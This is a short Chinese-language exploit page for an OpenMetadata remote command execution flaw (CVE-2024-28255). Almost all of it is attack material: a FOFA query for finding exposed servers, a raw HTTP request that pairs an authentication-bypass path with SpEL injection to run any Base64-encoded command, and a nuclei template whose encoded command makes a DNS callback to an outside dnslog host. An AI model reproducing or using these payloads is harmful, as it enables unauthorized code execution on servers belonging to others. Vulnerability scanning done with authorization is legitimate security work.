## OpenMetadata命令执行(CVE-2024-28255)

## fofa
```
icon_hash="733091897"
```

## poc
```
GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22Base64编码命令%22))) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Connection: close
Accept-Encoding: gzip
```

![78d091e4fbeaf6007c6605c09ff4025d](https://github.com/wy876/POC/assets/139549762/977f9bcb-c7f7-4a73-9918-9c06844c1436)


## nuclei POC
```
id: CVE-2024-28255

info:
  name: CVE-2024-28255
  author: xiaoming
  severity: high
  description: OpenMetadata Command Execution
  metadata:
    max-request: 1
    shodan-query: ""
    verified: true

http:
- raw:
  - |+
    GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22bnNsb29rdXAgdGVzdC5kbnNsb2cuY24=%22))) HTTP/1.1
    Host: {{Hostname}}
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
    Connection: close
    Accept-Encoding: gzip

  redirects: true
  matchers-condition: and
  matchers:
  - id: 1
    type: word
    part: body
    words:
    - "400"
    - java.lang.ProcessImpl
    condition: and
```